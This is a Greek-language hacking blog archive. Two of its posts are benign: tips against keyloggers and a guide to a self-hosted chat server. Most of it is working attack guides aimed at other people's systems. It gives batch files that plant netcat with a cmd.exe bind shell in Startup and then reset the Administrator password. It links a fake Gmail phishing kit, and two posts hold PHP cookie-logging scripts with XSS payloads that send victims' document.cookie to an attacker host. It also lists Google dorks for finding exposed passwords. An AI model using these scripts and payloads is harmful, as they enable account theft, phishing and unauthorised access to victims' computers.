Αρχείο για password

Πώς θα ξεγελάσετε τα keylogger

Posted in Ασφάλεια with tags , , on Μαρτίου 12, 2010 by netbiosX

Αν βρισκόσαστε σε κάποιο δημόσιο υπολογιστή (net cafe,πανεπιστημίου,δουλειάς κτλ) και δεν είστε σίγουροι για το πόσο καθαρός μπορεί να είναι ο υπολογιστής τότε είναι προτιμότερο προτού βάλετε τον οποιονδήποτε κωδικό σας να πάρετε κάποιες προφυλάξεις.

Ο λόγος είναι ο εξής:επειδή πρόκειται για υπολογιστές που έχει πρόσβαση πολύς κόσμος,ο καθένας θα μπορούσε να έχει εγκαταστήσει κάποιο keylogger με σκοπό την ανακάλυψη password.Εμπιστεύεστε το pin της πιστωτικής σας κάρτας στον καθένα?Γιατί να κάνετε λοιπόν το ίδιο και με τους κωδικούς σας?

1 Τρόπος  

Κάθε φορά που θα βρίσκεστε σε κάποια ιστοσελίδα και θα πρέπει να πληκτρολογήσετε έναν κωδικό μην τον πληκτρολογείτε απευθείας.Για παράδειγμα εάν ο κωδικός σας έχει την ονομασία Windows πληκτρολογήστε πρώτα το NDOW,μετά μετακινήστε τον κέρσορα στην αρχή του πεδίου του password χρησιμοποιώντας το ποντίκι μόνο (και όχι τα βελάκια) και πληκτρολογήστε το WI και τέλος μετακινήστε πάλι χρησιμοποιώντας μόνο το ποντίκι τον κέρσορα στο τέλος και πληκτρολογήστε το S.Με αυτόν τον τρόπο το keylogger θα καταγράψει το password σαν ndowwis και όχι σαν Windows.

2 Τρόπος

Η χρησιμοποίηση των virtual keyboard όπως το safekeys ή ακόμα και το πληκτρολόγιο οθόνης των Windows (Έναρξη—>Προγράμματα—>Βοηθήματα—>Διευκόλυνση πρόσβασης—>Πληκτρολόγιο οθόνης) μπορούν να ξεγελάσουν έναν keylogger.

3 Τρόπος

Οι portable browser όπως firefox,chrome και opera είναι ακόμα μία λύση για την αντιμετώπιση των keylogger.Μπορούμε για παράδειγμα να τους τρέξουμε από το usb μας πρώτα καθώς βρισκόμαστε σε κάποιο ασφαλές μηχάνημα που ξέρουμε ότι σίγουρα δεν τρέχει κάποιον ιό,να μπούμε στις ιστοσελίδες που θέλουμε και να βάλουμε τους κωδικούς μας έχοντας πάντα τσεκαρισμένη την επιλογή «remember me«.Με αυτόν τον τρόπο όταν θα βρεθούμε σε κάποιον υπολογιστή που δεν γνωρίζουμε τι τρέχει από πίσω,δεν θα χρειαστεί να πληκτρολογήσουμε κανέναν κωδικό αφού όλα τα password μας θα είναι αποθηκευμένα ήδη στο usb μας και ο browser θα τα τραβήξει από εκεί.

Φυσικά κανένας από τους παραπάνω τρόπους δεν εγγυάται 100% προστασία καθώς πολλά εξαρτώνται και από τον τύπο του keylogger αλλά σίγουρα είναι κάποια μέτρα προστασίας των κωδικών μας που ισχύουν κατά γενικό κανόνα. 

Advertisements

Χάκινγκ σε υπολογιστή δικτύου

Posted in Χάκινγκ with tags , , , , on Μαρτίου 5, 2010 by netbiosX

Όπως όλοι γνωρίζουμε ένα trojan είναι πολύ πιθανόν να ανακαλυφθεί από τα antivirus οπότε αυτό που θα χρειαστούμε στην συγκεκριμένη περίπτωση είναι το netcat.Το netcat είναι ένα πρόγραμμα το οποίο ανοίγει μία θύρα (port) σε κάποιον υπολογιστή για να μας δώσει πρόσβαση.

Θα πρέπει λοιπόν να γράψουμε ένα batch αρχείο το οποίο θα αντιγράφει το netcat στον απομακρυσμένο υπολογιστή.Για να γίνει αυτό θα πρέπει το batch αρχείο να εκτελεστεί με κάποιον τρόπο από τον υπολογιστή που θέλουμε να χακάρουμε.

Ανοίγουμε το σημειωματάρειο και πληκτρολογούμε το ακόλουθο:

@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe
cd «Documents and Settings»
cd «All Users»
cd «Start Menu»
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (Αυτό είναι ένα άλλο batch αρχείο που θα γράψουμε παρακάτω)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat

Το επόμενο batch αρχείο θα χρησιμοποιηθεί για να σιγουρευτούμε ότι το port που καθορίσαμε θα ανοίγει κάθε φορά που θα κάνουν εκκίνηση τα windows.Μπορούμε φυσικά να βάλουμε όποιο port επιθυμούμε.Ανοίγουμε λοιπόν το σημειωματάρειο πάλι και γράφουμε το εξής:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat.Αυτό θα είναι το αρχείο που θα αντιγραφεί στον φάκελο startup από το προηγούμενο bat που είχαμε γράψει.

Μπορούμε φυσικά να κρύψουμε αυτό το αρχείο σε ένα άλλο αρχείο και να το διαμοιράσουμε μέσα στο δίκτυο.Όταν κάποιος τρέξει το αρχείο το netcat θα αντιγραφεί στον υπολογιστή του και θα ανοίξει μία θύρα στην προκειμένη περίπτωση είναι η 9999.Μόλις η θύρα ανοίξει μπορούμε να χρησιμοποιήσουμε το telnet σε αυτήν την θύρα του απομακρυσμένου υπολογιστή και να αποκτήσουμε πλήρης πρόσβαση.

Τώρα που έχουμε πλήρης πρόσβαση το επόμενα βήμα είναι να αλλάξουμε το administrator password με την εντολή:

net user Administrator newpassword

Πλέον μπορούμε να κάνουμε ότι θέλουμε στον υπολογιστή όπως για παράδειγμα να τερματίσουμε την λειτουργία του κτλ.Μπορούμε να το κάνουμε αυτό απλώς αν μπούμε στον φάκελο System32 και πληκτρολογήσουμε το παρακάτω:

shutdown -r -t 10 -c «Hello»

Ο απομακρυσμένος υπολογιστής θα κάνει επανεκκίνηση μέσα σε 10 δευτερόλεπτα.Μπορούμε αν θέλουμε να το προχωρήσουμε ακόμα πιο μακριά απλά και μόνο αν εγκαταστήσουμε το Cain & Abel στον υπολογιστή μας και μετά εγκαταστήσουμε το Abel στον απομακρυσμένο υπολογιστή εφόσον πλέον ξέρουμε και το administrator password.Μόλις εγκατασταθεί το Abel στον απομακρυσμένο υπολογιστή μπορούμε να κάνουμε εκκίνηση και τερματισμό υπηρεσίων και πολλά περισσότερα… 

Κατεβάστε το netcat από εδώ.

Βρίσκοντας κωδικούς Gmail με την μέθοδο Phishing

Posted in Χάκινγκ with tags , , , , on Φεβρουαρίου 21, 2010 by netbiosX

Μία από τις πιο αποδοτικές μεθόδους για να χακάρουμε κάποιον λογαριασμό είναι η μέθοδος του Phishing.Ο λόγος είναι ότι αν το θύμα μας πιστέψει ότι η σελίδα στην οποία θα βάλει τον κωδικό του είναι η αυθεντική τότε εμείς άμεσα θα έχουμε τον κωδικό του χωρίς να προσπαθούμε για μέρες να το σπάσουμε με άλλες μεθόδους.

Για να βρούμε λοιπόν κάποιον κωδικό του Gmail με την μέθοδο του phishing αρκεί να κάνουμε τα παρακάτω:

1)Κατεβάζουμε την ψεύτικη σελίδα του Gmail και κάνουμε εξαγωγή τα περιεχόμενα του σε έναν φάκελο

Ψεύτικη Gmail σελίδα:

http://www.filefactory.com/file/b03d3g4/n/GmailFakepagedatalibrary.wordpress.com.rar

2)Δημιουργούμε έναν free λογαριασμό σε κάποιο από τα παρακάτω site:

 www.t35.com

www.ripway.com

www.110mb.com

3)Ανεβάζουμε σε όποιο από τα παραπάνω site έχουμε κάνει λογαριασμό όλα τα αρχεία που έχουν γίνει εξαγωγή (βήμα 1).Για το παράδειγμα μας θα επιλέξουμε την ιστοσελίδα www.t35.com

4)Ανοίγουμε την ψεύτικη σελίδα του Gmail και βάζουμε κάποιο ψεύτικο username και password για να δούμε ότι όντως λειτουργεί.Η ψεύτικη σελίδα μας θα βρίσκεται στο παρακάτω link:

http://onomatousitesas.t35.com/Gmail.htm

5)Ένα αρχείο με τον κωδικό που έχει εισαχθεί θα δημιουργηθεί στον ίδιο φάκελο και θα μπορείτε να το δείτε στο παρακάτω link:

http://onomatousitesas.t35.com/GmailPasswords.htm

Πλέον είστε έτοιμοι να βρείτε κωδικούς λογαριασμών gmail αρκεί να διαμοιράσετε το ψεύτικο site που θα μοιάζει με το gmail έξυπνα ούτως ώστε να ψάρεψετε όσους περισσότερους λογαριασμούς μπορείτε.

Υποσημείωση:

Αυτό το άρθρο είναι για εκπαιδευτικούς σκοπούς και μόνο και η datalibrary δεν φέρει καμία ευθύνη για το πως θα χρησιμοποιήσετε τα αρχεία που θα κατεβάσετε.

Πώς να έχουμε τον δικό μας Chat Server

Posted in Χρήσιμα with tags , , , , , on Σεπτεμβρίου 25, 2009 by netbiosX

Όπως γνωρίζουμε όλες οι συζήτησεις μας στο MSN και σε άλλους messenger δεν είναι καθόλου private.Όλες οι συζητήσεις αποθηκεύονται σε mainframes και τα password που αποστέλονται είναι σε plain text (καθαρό κείμενο) χωρίς καμία κρυπτογράφηση.

Αν θέλουμε λοιπόν να έχουμε μία ασφαλή συνομιλία με τους φίλους μας ή αν έχουμε κάτι να κρύψουμε τότε ίσως είναι μία καλή λύση να σκεφτούμε την περίπτωση να είμαστε εμείς ο server όπου θα γίνει η συνομιλία με αυτόν που θέλουμε.

Πώς μπορούμε να το κάνουμε αυτό?

Υπάρχουν αρκετά διαθέσιμα προγράμματα για αυτήν την δουλειά όπως το STChat που μπορούμε να το βρούμε στην παρακάτω διεύθυνση:

http://sourceforge.net/projects/stchat/

Μόλις το κατεβάσουμε το κάνουμε εξαγωγή στο C:/ και ο φάκελος θα έχει το όνομα stc-0_16.Ανοίγουμε το σημειωματάριο και γράφουμε το ακόλουθο:

@echo off
CD C:/stc-0_16
java stc 22

Το σώζουμε σαν .bat αρχείο και το τρέχουμε.Τώρα για να συνδεθούμε κάνουμε telnet IP 22.Όπου IP είναι η IP μας και 22 είναι το port για τις συνόδους telnet.Δίνοντας την IP μας σε αυτόν που θέλουμε να συνομιλήσουμε και εκτελώντας την ίδια εντολή (telnet) μπορεί να συνδεθεί στον υπολογιστή μας και μέσω telnet να αρχίσουμε να συνομιλούμε.

Πώς να κλέψουμε τα account μελών από ένα φόρουμ

Posted in Χάκινγκ with tags , , , , on Σεπτεμβρίου 23, 2009 by netbiosX

Μία από τις πιο διαδεδομένες τεχνικές για να κλέψουμε τον λογαριασμό κάποιου χρήστη ή και πολλών χρηστών είναι να χρησιμοποιήσουμε την μέθοδο XSS (Cross Site Scripting).

Θα πρέπει καταρχάς να χρησιμοποιήσουμε κάποιο web vulnerability scanner όπως το Acunetix ή το Paros για να βρούμε τα ευάλωτα φόρουμ σε επιθέσεις XSS.Μόλις εντοπίσουμε τον στόχο μας ακολουθούμε την παρακάτω διαδικασία.

1)Δημιουργούμε ένα αρχείο με το όνομα cookie.php και εισάγουμε τον παρακάτω κώδικα:

<?php
$cookie = $_GET['c'
];
$ip = getenv (’REMOTE_ADDR’
);
$date=date(”j F, Y, g:i a”
);;
$referer=getenv (’HTTP_REFERER’
);
$fp = fopen(’cookies.html’, ‘a’
);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’
);
fclose($fp
);
header (”Location: http://www.test.com
”);
?> 
 

Το αρχείο cookie.php το ανεβάζουμε σε κάποιο host site που έχουμε.Φυσικά στην προτελευταία σειρά τοποθετούμε την διεύθυνση του host μας αντί για test.com δηλαδή.

2)Δημιουργούμε ένα νέο thread στο ευάλωτο φόρουμ και πληκτρολογούμε το ακόλουθο:

<script>document.location=”http://www.myhost.com/cookie.php?c=” + document.cookies</script>

Φυσικά στο myhost.com βάζουμε το δικό μας host όπως είναι κατανοητό.

Τώρα όταν κάποιο μέλος του φόρουμ ανοίξει το thread τα cookies του θα σταλούν στο:

http://www.myhost.com/cookie.html

Οπότε έχοντας το cookie και σε συνδοιασμό με το πρόγραμμα Cain ή κάποιο άλλο cookie decoder θα μπορέσουμε να αποκρυπτογραφήσουμε το cookie για να βρούμε το password. 

Βρίσκοντας ευάλωτες ιστοσελίδες με το Google

Posted in Χάκινγκ with tags , , on Αύγουστος 13, 2009 by netbiosX

Παλαιότερα όταν κάποιος έψαχνε στην μηχανή αναζήτησης Google με συγκεκριμένα queries αυτήν στα αποτελέσματα της μπορούσε να εμφανίσει σημαντικές πληροφορίες όπως passwords από Admins,mail passwords κτλ.Τα τελευταία χρόνια όμως έχουν σταματήσει να εμφανίζεις οι περισσότερες »καλές» πληροφορίες για λόγους ασφαλείας κυριώς επειδή γίναν γνωστά όλα αυτά τα queries στο ευρύ κοινό.

Ωστόσο υπάρχει ακόμα περίπτωση να βρούμε στα αποτελέσματα του Google κάποιους κωδικούς,username κτλ.Τα queries που θα πρέπει να δώσουμε στην αναζήτηση του Google για να βρούμε τα περιεχόμενα φακέλων όπως admin,password,mail κτλ. είναι τα ακόλουθα:

«index of /admin»

«index of /password»

«index of /mail»

«index of /»+passwd

«index of /» password.txt

Επίσης μπορούμε να δοκιμάσουμε και να ψάξουμε για password hints προκειμένου να έχουμε κάποια παραπάνω στοιχεία για να σπάσουμε κάποιον κωδικό.Οι λέξεις κλειδιά είναι οι παρακάτω:

password hint

password hint -email

show password hint -email

filetype:htaccess user

Φυσικά όπως αναφέραμε και πιο πάνω είναι πλέον πολύ δύσκολο να εντοπίσουμε πάρα πολλά password αλλά έστω και για την μία φορά που θα βρούμε κάτι αξίζει η προσπάθεια.

Πώς να κλέψουμε τα cookies χρησιμοποιώντας XSS

Posted in Χάκινγκ with tags , , , on Αύγουστος 7, 2009 by netbiosX

Ένας τρόπος για να μπορέσουμε να βρούμε τους κωδικούς χρηστών από κάποια ιστοσελίδα είναι μέσω Cross Site Scripting (XSS).Θα πρέπει φυσικά η ιστοσελίδα να είναι vulnerable σε αυτού τους είδους τις επιθέσεις.Για να βρούμε ποιές ιστοσελίδες παρουσιάζουν αυτού του είδους την αδυναμία αρκεί να χρησιμοποιήσουμε το πρόγραμμα Acunetix Vulnerability Scanner.

Ποιά εργαλεία θα χρειαστούμε?

Μόλις βρούμε τον στόχο μας τότε θα χρειαστούμε τα ακόλουθα:

  1. Έναν λογαριασμό σε ένα hosting site
  2. 2 σελίδες με κώδικα php
  3. Την ιστοσελίδα που είναι vulnerable

Μπορούμε να βρούμε αρκετά hosting sites που υποστηρίζουν php όπως:

www.000webhost.com

http://www.free-webhosts.com/free-php-webhosting.php

Δημιουργούμε λοιπόν έναν λογαριασμό σε κάποιο free hosting site για να ανεβάσουμε τις php σελίδες μας.Η μία σελίδα θα έχει το όνομα vb.php και θα περιέχει τον κώδικα:

<head>
<meta http-equiv=»Content-Language» content=»it»>
<title>Cookies Stealther</title>
</head>

<body bgcolor=»#C0C0C0″>

<p align=»center»><font color=»#FF0000″>COOKIES STEALTHER</font></p>
<p align=»center»><font face=»Arial» color=»#FF0000″>By R00T[ATI]</font></p>
<p align=»left»>&nbsp;</p>

</body>

και η άλλη σελίδα θα έχει το όνομα documents.php και θα περιέχει τον εξής κώδικα:

<?php

$ip = $_SERVER[‘REMOTE_ADDR’];
$referer = $_SERVER[‘HTTP_REFERER’];
$agent = $_SERVER[‘HTTP_USER_AGENT’];

$data = $_GET[c];

$time = date(«Y-m-d G:i:s A»);
$text = «<br><br>».$time.» = «.$ip.»<br><br>User Agent: «.$agent.»<br>Referer:  «.$referer.»<br>Session: «.$data.»<br><br><br>»;

$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(«Location:
http://www.google.com«);

?>

Η σελίδα vb.php χρησιμοποιείται για να εμφανίσει σε εμάς τα cookies που έχει κλέψει και άλλες πληροφορίες ενώ η σελίδα documents.php χρησιμοποιείται για να πάρει πληροφορίες από τα πιθανά θύματα όπως η IP τους διεύθυνση κτλ.

Τώρα στην ιστοσελίδα που είναι vulnerable σε XSS θα πρέπει να εισάγουμε το ακόλουθο script:

http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location=»http://www.example-of-hosting/documents.php?c=»+document.cookie;</script>

Τα μέλη που θα πέσουν θύματα αυτής της επίθεσης θα κατευθυνούν στο site της google (μπορούμε στο αρχείο documents.php να βάλουμε όποια άλλη σελίδα θέλουμε) και εμείς θα μπορούμε να δούμε τα cookies στο αρχείο vb.php